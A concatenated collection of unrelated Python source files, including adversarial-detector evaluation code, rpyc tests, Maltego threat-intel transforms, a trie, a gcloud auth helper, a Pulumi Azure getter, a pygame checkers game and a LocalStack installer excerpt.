key = None
cls_norm = [(0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)]
weight = "trained_models/CIFAR-10/PGDAT_densenet169BN_adaptiveT1.0_selfreweightCalibrate_SGconW_seed0/model_best_s.pth"
# RR params
num_cla = 10
elif args.dataset == "gtsrb":
classifier = ResNet18
key = "model"
cls_norm = [(0.3337, 0.3064, 0.3171), (0.2672, 0.2564, 0.2629)]
# RR params
weight = "trained_models/gtsrb/PGDAT_ResNet18BN_adaptiveT1.0_selfreweightCalibrate_SGconW_seed0/model_best.pth"
num_cla = 43
else:
raise NotImplementedError()
# log
args.results_dir = os.path.join(
args.results_dir, 'RR-1-{}-'.format(args.dataset) +
datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
)
run_name = args.dataset
if not os.path.exists(args.results_dir):
os.makedirs(args.results_dir)
utils.make_logger(run_name, args.results_dir)
logging.info(args)
# detector
classifier = classifier(num_classes=num_cla,
along=True, out_dim=1, use_BN=True)
detector = RRdetector(classifier, cls_norm)
detector.load_classifier(weight)
detector = detector.cuda()
detector.eval()
logging.info(detector)
# test_data
test_data = LoadDataset(
args.dataset, args.data_path, train=False, download=False,
resize_size=args.img_size, hdf5_path=None, random_flip=False,
norm=False)
test_loader = DataLoader(
test_data, batch_size=args.batch_size, shuffle=False, num_workers=4,
pin_memory=True)
# start detect
thrs = detector.get_thrs(test_loader, drop_rate=args.drop_rate)
detector.thresh = thrs
total, fp = 0, 0
fp_tn, total_pass_cor, total_rej_wrong = 0, 0, 0
for img, classId in test_loader:
all_pass, _ = detector.detect(img, args.batch_size)
# here we expect data in range [0, 1]
y_pred = detector.classify_normal(img, args.batch_size)
cls_cor = (y_pred == classId)
# FPR
fp += torch.logical_and(cls_cor, all_pass == 0).sum().item()
fp_tn += cls_cor.sum().item()
# robust acc
total += img.shape[0]
total_rej_wrong += torch.logical_and(
cls_cor == 0, all_pass == 0).sum().item()
total_pass_cor += torch.logical_and(
cls_cor == 1, all_pass).sum().item()
print(total_pass_cor, total_rej_wrong, fp, fp_tn, total)
# FPR
logging.info("FPR: (rej & cor) / cor = {}".format(fp / fp_tn))
# robust acc
logging.info("clean acc: (pass & cor + rej & wrong) / all = {}".format(
(total_pass_cor + total_rej_wrong) / total))
test_whitebox(args, args.ae_path, detector)
|
py | 1a4f9a1bb758d86fcf41a52e408246e2079f82f2 | from .concat_vec_env import ConcatVecEnv
from .multiproc_vec import ProcConcatVec
class call_wrap:
def __init__(self, fn, data):
self.fn = fn
self.data = data
def __call__(self, *args):
return self.fn(self.data)
def MakeCPUAsyncConstructor(max_num_cpus):
if max_num_cpus == 0:
return ConcatVecEnv
else:
def constructor(env_fn_list, obs_space, act_space):
example_env = env_fn_list[0]()
envs_per_env = getattr(example_env, "num_envs", 1)
num_fns = len(env_fn_list)
envs_per_cpu = (num_fns + max_num_cpus - 1) // max_num_cpus
alloced_num_cpus = (num_fns + envs_per_cpu - 1) // envs_per_cpu
env_cpu_div = []
num_envs_alloced = 0
while num_envs_alloced < num_fns:
start_idx = num_envs_alloced
end_idx = min(num_fns, start_idx + envs_per_cpu)
env_cpu_div.append(env_fn_list[start_idx:end_idx])
num_envs_alloced = end_idx
assert alloced_num_cpus == len(env_cpu_div)
cat_env_fns = [call_wrap(ConcatVecEnv, env_fns) for env_fns in env_cpu_div]
return ProcConcatVec(cat_env_fns, obs_space, act_space, num_fns * envs_per_env)
return constructor
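# Example usage (illustrative; `make_env`, `obs_space` and `act_space` are
# placeholders that this module does not define):
#
#   constructor = MakeCPUAsyncConstructor(max_num_cpus=4)
#   vec_env = constructor([make_env] * 16, obs_space, act_space)
#
# With max_num_cpus == 0 all environments run in-process via ConcatVecEnv;
# otherwise the env constructors are split across up to max_num_cpus workers.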
|
py | 1a4f9a869353056b5fb251fdd47e611fe29d5d9b | import time
import unittest
import rpyc
class TestAsync(unittest.TestCase):
def setUp(self):
self.conn = rpyc.classic.connect_thread()
        # rpyc renamed `async` to `async_` once `async` became a reserved keyword
        self.a_sleep = rpyc.async_(self.conn.modules.time.sleep)
        self.a_int = rpyc.async_(self.conn.builtin.int)
def tearDown(self):
self.conn.close()
def test_asyncresult_api(self):
res = self.a_sleep(2)
self.assertFalse(res.ready)
res.wait()
self.assertTrue(res.ready)
self.assertFalse(res.expired)
self.assertFalse(res.error)
self.assertEqual(res.value, None)
def test_asyncresult_expiry(self):
res = self.a_sleep(5)
res.set_expiry(4)
t0 = time.time()
self.assertRaises(rpyc.AsyncResultTimeout, res.wait)
dt = time.time() - t0
#print( "timed out after %s" % (dt,) )
self.assertTrue(dt >= 3.5, str(dt))
self.assertTrue(dt <= 4.5, str(dt))
def test_asyncresult_callbacks(self):
res = self.a_sleep(2)
visited = []
def f(res):
assert res.ready
assert not res.error
visited.append("f")
def g(res):
visited.append("g")
res.add_callback(f)
res.add_callback(g)
res.wait()
self.assertEqual(set(visited), set(["f", "g"]))
def test_timed(self):
timed_sleep = rpyc.timed(self.conn.modules.time.sleep, 5)
res = timed_sleep(3)
res.value
res = timed_sleep(7)
self.assertRaises(rpyc.AsyncResultTimeout, lambda: res.value)
def test_exceptions(self):
res = self.a_int("foo")
res.wait()
self.assertTrue(res.error)
self.assertRaises(ValueError, lambda: res.value)
if __name__ == "__main__":
unittest.main()
|
py | 1a4f9b4268b8dbdeecb8b4aac7c81dea38c9b733 | # Generated by Django 3.2.1 on 2021-05-07 18:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='user',
name='email',
field=models.EmailField(max_length=254, unique=True),
),
]
|
py | 1a4f9b7b2507f631010c37b252883acd413af2f3 | import sys
from helpers import api_qradio as q
from helpers import MaltegoTransform
##############################################################
## ENRICH Section
def ipv4_enrich(mt, ip_address):
enrich_list = q.ipv4_enrich(ip_address)
for domain in enrich_list['domains']:
mt.addEntity("maltego.Domain", domain)
for hash in enrich_list['hash']:
mt.addEntity("maltego.Hash", hash)
for score in enrich_list['score']:
mt.addEntity("maltego.Score", score)
mt.addEntity("maltego.Blacklist", str(enrich_list['blacklist']))
return mt
def domain_enrich(mt, domain_name):
enrich_list = q.domain_enrich(domain_name)
for ip_address in enrich_list['ip_address']:
mt.addEntity("maltego.IPv4Address", ip_address)
for hash in enrich_list['hash']:
mt.addEntity("maltego.Hash", hash)
for score in enrich_list['score']:
mt.addEntity("maltego.Score", score)
return mt
def hash_enrich(mt, hash_value):
enrich_list = q.hash_enrich(hash_value)
for score in enrich_list:
mt.addEntity("maltego.Score", score['score'])
for ip_address in enrich_list:
mt.addEntity("maltego.IPv4Address", ip_address['ip_address'])
for imphash in enrich_list:
mt.addEntity("maltego.Imphash", imphash['imphash'])
for uri in enrich_list:
mt.addEntity("maltego.URI", uri['uri'])
return mt
##############################################################
## IP section
def ipv4_to_domain(mt, ip_address):
domain_list = q.ipv4_to_domain(ip_address)
for domain in domain_list:
mt.addEntity("maltego.Domain", domain)
return mt
def ipv4_to_hash(mt, ip_address):
hash_list = q.ipv4_to_hash(ip_address)
for hash in hash_list:
mt.addEntity("maltego.Hash", hash)
return mt
def ipv4_to_blacklist(mt, ip_address):
blacklisted = q.ipv4_to_blacklist(ip_address)
mt.addEntity("maltego.Blacklist", blacklisted)
return mt
def ipv4_to_score(mt, ip_address):
score_list = q.ipv4_to_score(ip_address)
for score in score_list:
mt.addEntity("maltego.Score", score)
return mt
##############################################################
## Domain section
def domain_to_ipv4(mt, domain_name):
ip_list = q.domain_to_ipv4(domain_name)
for ip_address in ip_list:
mt.addEntity("maltego.IPv4Address", ip_address)
return mt
def domain_to_hash(mt, domain_name):
hash_list = q.domain_to_hash(domain_name)
for hash in hash_list:
mt.addEntity("maltego.Hash", hash)
return mt
def domain_to_score(mt, domain_name):
score_list = q.domain_to_score(domain_name)
for score in score_list:
mt.addEntity("maltego.Score", score)
return mt
##############################################################
## Hash section
def hash_to_score(mt, hash_value):
    score_list = q.hash_to_score(hash_value)
    for score in score_list:
        mt.addEntity("maltego.Score", score)
    return mt
def hash_to_imphash(mt, hash_value):
    imphash_list = q.hash_to_imphash(hash_value)
    for imphash in imphash_list:
        mt.addEntity("maltego.Imphash", imphash)
    return mt
def hash_to_ipv4(mt, hash_value):
    ip_list = q.hash_to_ipv4(hash_value)
    for ip_address in ip_list:
        mt.addEntity("maltego.IPv4Address", ip_address)
    return mt
def hash_to_uri(mt, hash_value):
    uri_list = q.hash_to_uri(hash_value)
    for uri in uri_list:
        mt.addEntity("maltego.URI", uri)
    return mt
##############################################################
## Imphash section
def imphash_to_hash(mt, imphash):
hash_list = q.imphash_to_hash(imphash)
for hash in hash_list:
mt.addEntity("maltego.Hash", hash)
return mt
##############################################################
functions = {
'ipv4_enrich': ipv4_enrich,
'domain_enrich': domain_enrich,
'hash_enrich': hash_enrich,
'ipv4_to_domain': ipv4_to_domain,
'ipv4_to_hash': ipv4_to_hash,
'ipv4_to_blacklist': ipv4_to_blacklist,
'ipv4_to_score': ipv4_to_score,
'domain_to_ipv4': domain_to_ipv4,
'domain_to_hash': domain_to_hash,
'domain_to_score': domain_to_score,
'hash_to_score': hash_to_score,
'hash_to_imphash': hash_to_imphash,
'hash_to_ipv4': hash_to_ipv4,
'hash_to_uri': hash_to_uri,
'imphash_to_hash': imphash_to_hash,
}
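# Example invocation (illustrative; the script name and value are placeholders):
#
#   python transform.py ipv4_enrich 8.8.8.8
#
# The first argument selects an entry from the `functions` table above and the
# second argument is the entity value handed to that transform.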
##### MAIN #####
if __name__ == '__main__':
transform = sys.argv[1]
data = sys.argv[2]
mt = MaltegoTransform()
result = functions[transform](mt, data)
result.returnOutput() |
py | 1a4f9c4a8b1293482860865a9ff356b0c571ede5 |
class Node():
def __init__(self, alphabet):
self.char = alphabet
self.children = []
self.end_of_word = False
self.counter = 1
'''
Create a tree of alphabets like this:
+
/ \
c d
/ \
a o
/ \ \
t p g
'''
class Trie():
def __init__(self):
self.root = Node('+')
def addWord(self, word):
node = self.root
for letter in word:
found_flag = False
for child in node.children:
if child.char == letter:
child.counter += 1
node = child
found_flag = True
break
if not found_flag:
newChild = Node(letter)
node.children.append(newChild)
node = newChild
node.end_of_word = True
    def findWord(self, word):
        node = self.root
        found_flag = False
        for letter in word:
            found_flag = False
            for child in node.children:
                if child.char == letter:
                    node = child
                    found_flag = True
                    break
            if not found_flag:
                # a letter on the path is missing, so the word is not stored
                return False
        return found_flag and node.end_of_word
    def delWord(self, word):
        node = self.root
        if(not self.findWord(word)):
            print("Word not found")
            return
        for letter in word:
            for child in node.children:
                if child.char == letter:
                    if child.counter == 1:
                        node.children.remove(child)
                        return
                    else:
                        node = child
                        break
        # In the case we want to delete 'dog' but keep 'dogs': every node on the
        # path is shared with another word, so only clear the end-of-word flag.
        node.end_of_word = False
        return
def discover(self, node, prefix):
words = []
for child in node.children:
if child.end_of_word:
words.append(prefix + child.char)
if child.children:
words.extend(self.discover(child, prefix + child.char))
else:
words.extend(self.discover(child, prefix + child.char))
return words
def wordsWithPrefix(self, prefix):
node = self.root
found_flag = False
for letter in prefix:
found_flag = False
for child in node.children:
if letter == child.char:
node = child
found_flag = True
break
if not found_flag:
return []
return self.discover(node, prefix)
def allWords(self):
node = self.root
return self.discover(node, "")
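if __name__ == "__main__":
    # Small demo (illustrative, not part of the original file).
    trie = Trie()
    for word in ("cat", "cap", "dog", "dogs"):
        trie.addWord(word)
    print(trie.findWord("cat"))        # True
    print(trie.wordsWithPrefix("ca"))  # ['cat', 'cap']
    trie.delWord("dog")
    print(trie.findWord("dog"))        # False ('dogs' is kept)
    print(trie.findWord("dogs"))       # True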
|
py | 1a4f9c56709069ce5bcf8a7a39563ba80269abb0 | from YTR import app
# Python imports
import subprocess
import json
import os
def open_browser():
# open config.JSON as r+
config = open("config.JSON", "r+")
my_config = json.load(config)
if my_config['OS'] == 'Linux':
subprocess.run("sensible-browser 127.0.0.1:5100", shell=True)
elif my_config['OS'] == 'OSX':
subprocess.run("open 127.0.0.1:5100", shell=True)
# open_browser()
if __name__ == '__main__':
app.run(debug=True, port=5100)
|
py | 1a4f9d7fada50d89819a0f9bbefdbf175bbee4c9 | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
# from flask_script import Manager
from flask_migrate import Migrate #, MigrateCommand
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///storage.db'
db = SQLAlchemy(app)
migrate = Migrate(app, db)
#manager = Manager(app)
#manager.add_command('db', MigrateCommand)
from app.controllers import default
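# Typical migration workflow with Flask-Migrate (run in a shell; the FLASK_APP
# value is an assumption about how this package is exposed):
#
#   export FLASK_APP=app
#   flask db init
#   flask db migrate -m "initial tables"
#   flask db upgrade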
|
py | 1a4f9ed669a9e539dc0dc9f4c72c271f488dc06a | # -*- coding: utf-8 -*- #
# Copyright 2016 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A library to support auth commands."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import json
from googlecloudsdk.core import context_aware
from googlecloudsdk.core import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import yaml
from googlecloudsdk.core.credentials import flow as c_flow
from googlecloudsdk.core.credentials import google_auth_credentials as c_google_auth
from googlecloudsdk.core.util import files
# Client ID from project "usable-auth-library", configured for
# general purpose API testing
# pylint: disable=g-line-too-long
DEFAULT_CREDENTIALS_DEFAULT_CLIENT_ID = '764086051850-6qr4p6gpi6hn506pt8ejuq83di341hur.apps.googleusercontent.com'
DEFAULT_CREDENTIALS_DEFAULT_CLIENT_SECRET = 'd-FL95Q19q7MQmFpd7hHD0Ty'
CLOUD_PLATFORM_SCOPE = 'https://www.googleapis.com/auth/cloud-platform'
GOOGLE_DRIVE_SCOPE = 'https://www.googleapis.com/auth/drive'
USER_EMAIL_SCOPE = 'https://www.googleapis.com/auth/userinfo.email'
OPENID = 'openid'
DEFAULT_SCOPES = [
OPENID,
USER_EMAIL_SCOPE,
CLOUD_PLATFORM_SCOPE
]
CLIENT_SECRET_INSTALLED_TYPE = 'installed'
class Error(exceptions.Error):
"""A base exception for this class."""
pass
class InvalidClientSecretsError(Error):
"""An error for when we fail to load the client secrets file."""
pass
class BadCredentialFileException(Error):
"""Raised when credentials file cannot be read."""
pass
def GetCredentialsConfigFromFile(filename):
"""Returns the JSON content of a credentials config file.
This function is useful when the content of a file need to be inspected first
before determining how to handle it (how to initialize the underlying
credentials). Only UTF-8 JSON files are supported.
Args:
filename (str): The filepath to the ADC file representing credentials.
Returns:
Optional(Mapping): The JSON content.
Raises:
BadCredentialFileException: If JSON parsing of the file fails.
"""
try:
# YAML is a superset of JSON.
content = yaml.load_path(filename)
except UnicodeDecodeError as e:
raise BadCredentialFileException(
'File {0} is not utf-8 encoded: {1}'.format(filename, e))
except yaml.YAMLParseError as e:
raise BadCredentialFileException('Could not read json file {0}: {1}'.format(
filename, e))
# Require the JSON content to be an object.
# Credentials and configs are always objects.
if not isinstance(content, dict):
raise BadCredentialFileException(
'Could not read json file {0}'.format(filename))
return content
def DoInstalledAppBrowserFlowGoogleAuth(launch_browser,
scopes,
client_id_file=None):
"""Launches a 3LO oauth2 flow to get google-auth credentials.
Args:
launch_browser: bool, True to launch the browser, false to ask users to copy
the auth url to a browser.
scopes: [str], The list of scopes to authorize.
client_id_file: str, The path to a file containing the client id and secret
to use for the flow. If None, the default client id for the Cloud SDK is
used.
Returns:
google.auth.credentials.Credentials, The credentials obtained from the flow.
"""
if client_id_file:
AssertClientSecretIsInstalledType(client_id_file)
google_auth_flow = c_flow.CreateGoogleAuthFlow(scopes, client_id_file)
try:
user_creds = c_flow.RunGoogleAuthFlow(google_auth_flow, launch_browser)
return c_google_auth.Credentials.FromGoogleAuthUserCredentials(
user_creds)
except c_flow.Error as e:
if context_aware.IsContextAwareAccessDeniedError(e):
msg = context_aware.CONTEXT_AWARE_ACCESS_HELP_MSG
else:
msg = 'There was a problem with web authentication.'
if launch_browser:
msg += ' Try running again with --no-launch-browser.'
log.error(msg)
raise
def GetClientSecretsType(client_id_file):
"""Get the type of the client secrets file (web or installed)."""
invalid_file_format_msg = (
'Invalid file format. See '
'https://developers.google.com/api-client-library/'
'python/guide/aaa_client_secrets')
try:
obj = json.loads(files.ReadFileContents(client_id_file))
except files.Error:
raise InvalidClientSecretsError(
'Cannot read file: "%s"' % client_id_file)
if obj is None:
raise InvalidClientSecretsError(invalid_file_format_msg)
if len(obj) != 1:
raise InvalidClientSecretsError(
invalid_file_format_msg + ' '
'Expected a JSON object with a single property for a "web" or '
'"installed" application')
return tuple(obj)[0]
def AssertClientSecretIsInstalledType(client_id_file):
client_type = GetClientSecretsType(client_id_file)
if client_type != CLIENT_SECRET_INSTALLED_TYPE:
raise InvalidClientSecretsError(
'Only client IDs of type \'%s\' are allowed, but encountered '
'type \'%s\'' % (CLIENT_SECRET_INSTALLED_TYPE, client_type))
|
py | 1a4f9f88d1826898c1fa450b83a4cf2d261a9343 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetNetworkSecurityGroupResult',
'AwaitableGetNetworkSecurityGroupResult',
'get_network_security_group',
]
@pulumi.output_type
class GetNetworkSecurityGroupResult:
"""
NetworkSecurityGroup resource.
"""
def __init__(__self__, default_security_rules=None, etag=None, id=None, location=None, name=None, network_interfaces=None, provisioning_state=None, resource_guid=None, security_rules=None, subnets=None, tags=None, type=None):
if default_security_rules and not isinstance(default_security_rules, list):
raise TypeError("Expected argument 'default_security_rules' to be a list")
pulumi.set(__self__, "default_security_rules", default_security_rules)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if network_interfaces and not isinstance(network_interfaces, list):
raise TypeError("Expected argument 'network_interfaces' to be a list")
pulumi.set(__self__, "network_interfaces", network_interfaces)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if resource_guid and not isinstance(resource_guid, str):
raise TypeError("Expected argument 'resource_guid' to be a str")
pulumi.set(__self__, "resource_guid", resource_guid)
if security_rules and not isinstance(security_rules, list):
raise TypeError("Expected argument 'security_rules' to be a list")
pulumi.set(__self__, "security_rules", security_rules)
if subnets and not isinstance(subnets, list):
raise TypeError("Expected argument 'subnets' to be a list")
pulumi.set(__self__, "subnets", subnets)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="defaultSecurityRules")
def default_security_rules(self) -> Optional[Sequence['outputs.SecurityRuleResponse']]:
"""
The default security rules of network security group.
"""
return pulumi.get(self, "default_security_rules")
@property
@pulumi.getter
def etag(self) -> Optional[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkInterfaces")
def network_interfaces(self) -> Sequence['outputs.NetworkInterfaceResponse']:
"""
A collection of references to network interfaces.
"""
return pulumi.get(self, "network_interfaces")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> Optional[str]:
"""
The provisioning state of the public IP resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> Optional[str]:
"""
The resource GUID property of the network security group resource.
"""
return pulumi.get(self, "resource_guid")
@property
@pulumi.getter(name="securityRules")
def security_rules(self) -> Optional[Sequence['outputs.SecurityRuleResponse']]:
"""
A collection of security rules of the network security group.
"""
return pulumi.get(self, "security_rules")
@property
@pulumi.getter
def subnets(self) -> Sequence['outputs.SubnetResponse']:
"""
A collection of references to subnets.
"""
return pulumi.get(self, "subnets")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetNetworkSecurityGroupResult(GetNetworkSecurityGroupResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetNetworkSecurityGroupResult(
default_security_rules=self.default_security_rules,
etag=self.etag,
id=self.id,
location=self.location,
name=self.name,
network_interfaces=self.network_interfaces,
provisioning_state=self.provisioning_state,
resource_guid=self.resource_guid,
security_rules=self.security_rules,
subnets=self.subnets,
tags=self.tags,
type=self.type)
def get_network_security_group(expand: Optional[str] = None,
network_security_group_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetNetworkSecurityGroupResult:
"""
NetworkSecurityGroup resource.
:param str expand: Expands referenced resources.
:param str network_security_group_name: The name of the network security group.
:param str resource_group_name: The name of the resource group.
"""
__args__ = dict()
__args__['expand'] = expand
__args__['networkSecurityGroupName'] = network_security_group_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:network/v20180401:getNetworkSecurityGroup', __args__, opts=opts, typ=GetNetworkSecurityGroupResult).value
return AwaitableGetNetworkSecurityGroupResult(
default_security_rules=__ret__.default_security_rules,
etag=__ret__.etag,
id=__ret__.id,
location=__ret__.location,
name=__ret__.name,
network_interfaces=__ret__.network_interfaces,
provisioning_state=__ret__.provisioning_state,
resource_guid=__ret__.resource_guid,
security_rules=__ret__.security_rules,
subnets=__ret__.subnets,
tags=__ret__.tags,
type=__ret__.type)
|
py | 1a4f9fa48965d8711f6e006d82a3d3395b205570 | import uuid
import numpy as np
class Detection():
"""Detection Result"""
def __init__(self, box, score):
"""
Args:
box: bounding box as [x, y, w, h]
score: detection confidence in [0, 1]
"""
        self.box = np.asarray(box, dtype=float)
self.score = score
def to_array(self):
return np.append(self.box, self.score)
def get_box_xyxy(self):
box = self.box.copy()
box[2:] += box[:2]
return box
def to_array_xyxy(self):
return np.append(self.get_box_xyxy(), self.score)
class Track():
""" Single target tracking """
NEW = 0
ACTIVE = 1
FINISHED = 2
def __init__(self, det, track_id=None):
"""
Returns a single target tracker.
Args:
det: Detection result object
track_id: unique track id. Assigns random 6 digit hex string if None. Default=None.
"""
self.box = det.get_box_xyxy()
self.score = det.score
self.status = Track.NEW
self.track_id = track_id if track_id is not None else uuid.uuid4().hex[:6]
self.frames = 1
self.status = Track.NEW
def __str__(self):
"""print str"""
return "%s" % self.to_dict()
def to_dict(self):
"""Returns dict representation"""
return {
'track_id': self.track_id,
'box': self.box,
'score': self.score,
'status': self.status,
'frames': self.frames
}
def update(self, det):
"""Update tracker.
Args:
det: Detection result object
"""
self.box = det.get_box_xyxy()
self.score = det.score
self.frames += 1
def active(self):
"""Set status to active"""
self.status = Track.ACTIVE
def finish(self):
"""Set status to finished; can be marked for deletion"""
self.status = Track.FINISHED
def is_finished(self):
return self.status == Track.FINISHED
class Tracker():
""" Multi-target tracker """
def __init__(self):
self.tracks = []
def track(self, detections):
        raise NotImplementedError
def get_tracks(self):
"""Returns new or active tacks"""
tracks = [track for track in self.tracks if not track.is_finished()]
tracks = np.asarray(tracks)
return tracks
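# Illustrative sketch (not part of the original module): how a caller might feed
# per-frame detections into a single Track. The box values and scores below are
# made-up examples.
def _example_track_usage():
    det = Detection([10.0, 20.0, 50.0, 80.0], 0.90)
    trk = Track(det)
    trk.active()
    # a follow-up detection of the same target in the next frame
    trk.update(Detection([12.0, 21.0, 50.0, 80.0], 0.92))
    return trk.to_dict()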
|
py | 1a4fa0082308945a86cdc1acf6337e097b281ff6 | import pygame
from .board import Board
from .config import RED, WHITE, BLUE, BLACK, SQUARE_SIZE
class Game():
def __init__(self, win):
self.win = win
self._init()
def _init(self):
self.selected_piece = None
self.board = Board()
self.turn = RED
self.valid_moves = {}
def update(self):
self.board.draw(self.win)
self.draw_valid_moves(self.valid_moves)
pygame.display.update()
def reset(self):
self._init()
def select(self, row, col):
if self.selected_piece:
result = self._move(row, col)
if not result:
self.selected_piece = None
self.select(row, col)
piece = self.board.get_piece(row, col)
if piece != 0 and piece.color == self.turn:
self.selected_piece = piece
self.valid_moves = self.board.get_valid_moves(piece)
return True
return False
def _move(self, row, col):
piece = self.board.get_piece(row, col)
if self.selected_piece and piece == 0 and (row, col) in self.valid_moves:
self.board.move(self.selected_piece, row, col)
skipped = self.valid_moves[(row, col)]
if skipped:
self.board.remove(skipped)
self.change_turn()
return True
return False
def draw_valid_moves(self, moves):
for move in moves:
row, col = move
half_square_size = SQUARE_SIZE // 2
x_pos = col * SQUARE_SIZE + half_square_size
y_pos = row * SQUARE_SIZE + half_square_size
radius = 15
pygame.draw.circle(self.win, BLUE, (x_pos, y_pos), radius)
def change_turn(self):
self.valid_moves = {}
self.turn = BLUE if self.turn == RED else RED
def winner(self):
return self.board.winner(self.turn)
def get_board(self):
return self.board
def ai_move(self, board):
self.board = board
self.change_turn()
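# Illustrative sketch (not part of the original module): a minimal event loop that
# drives this Game class. WIDTH, HEIGHT and FPS are assumed placeholder values; the
# real project presumably defines window size and frame rate in its config module.
def _example_game_loop():
    WIDTH, HEIGHT, FPS = 800, 800, 60
    pygame.init()
    win = pygame.display.set_mode((WIDTH, HEIGHT))
    game = Game(win)
    clock = pygame.time.Clock()
    running = True
    while running:
        clock.tick(FPS)
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
            elif event.type == pygame.MOUSEBUTTONDOWN:
                x_pos, y_pos = pygame.mouse.get_pos()
                game.select(y_pos // SQUARE_SIZE, x_pos // SQUARE_SIZE)
        game.update()
    pygame.quit()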
|
py | 1a4fa03587578779ec4cb8f06f740418bb97d87e | from .yaml_config_hook import yaml_config_hook
from .save_model import save_model
|
py | 1a4fa1090d9a69583587d10d67181e84c3191779 | #!/usr/bin/env python
import glob
import logging
import os
import platform
import re
import shutil
import sys
import tempfile
import time
import requests
from localstack import config
from localstack.config import KINESIS_PROVIDER
from localstack.constants import (
DEFAULT_SERVICE_PORTS,
DYNAMODB_JAR_URL,
DYNAMODB_JAR_URL_ALPINE,
ELASTICMQ_JAR_URL,
ELASTICSEARCH_DEFAULT_VERSION,
ELASTICSEARCH_DELETE_MODULES,
ELASTICSEARCH_PLUGIN_LIST,
ELASTICSEARCH_URLS,
INSTALL_DIR_INFRA,
KMS_URL_PATTERN,
LOCALSTACK_INFRA_PROCESS,
LOCALSTACK_MAVEN_VERSION,
MODULE_MAIN_PATH,
STS_JAR_URL,
)
from localstack.utils import bootstrap
from localstack.utils.common import is_windows
if __name__ == "__main__":
bootstrap.bootstrap_installation()
# noqa: E402
from localstack.utils.common import (
chmod_r,
download,
get_arch,
in_docker,
is_alpine,
load_file,
mkdir,
new_tmp_file,
parallelize,
rm_rf,
run,
save_file,
untar,
unzip,
)
INSTALL_DIR_NPM = "%s/node_modules" % MODULE_MAIN_PATH
INSTALL_DIR_DDB = "%s/dynamodb" % INSTALL_DIR_INFRA
INSTALL_DIR_KCL = "%s/amazon-kinesis-client" % INSTALL_DIR_INFRA
INSTALL_DIR_STEPFUNCTIONS = "%s/stepfunctions" % INSTALL_DIR_INFRA
INSTALL_DIR_KMS = "%s/kms" % INSTALL_DIR_INFRA
INSTALL_DIR_ELASTICMQ = "%s/elasticmq" % INSTALL_DIR_INFRA
INSTALL_PATH_LOCALSTACK_FAT_JAR = "%s/localstack-utils-fat.jar" % INSTALL_DIR_INFRA
INSTALL_PATH_DDB_JAR = os.path.join(INSTALL_DIR_DDB, "DynamoDBLocal.jar")
INSTALL_PATH_KCL_JAR = os.path.join(INSTALL_DIR_KCL, "aws-java-sdk-sts.jar")
INSTALL_PATH_STEPFUNCTIONS_JAR = os.path.join(INSTALL_DIR_STEPFUNCTIONS, "StepFunctionsLocal.jar")
INSTALL_PATH_KMS_BINARY_PATTERN = os.path.join(INSTALL_DIR_KMS, "local-kms.<arch>.bin")
INSTALL_PATH_ELASTICMQ_JAR = os.path.join(INSTALL_DIR_ELASTICMQ, "elasticmq-server.jar")
INSTALL_PATH_KINESALITE_CLI = os.path.join(INSTALL_DIR_NPM, "kinesalite", "cli.js")
INSTALL_PATH_KINESIS_MOCK = os.path.join(INSTALL_DIR_INFRA, "kinesis-mock")
URL_LOCALSTACK_FAT_JAR = (
"https://repo1.maven.org/maven2/"
+ "cloud/localstack/localstack-utils/{v}/localstack-utils-{v}-fat.jar"
).format(v=LOCALSTACK_MAVEN_VERSION)
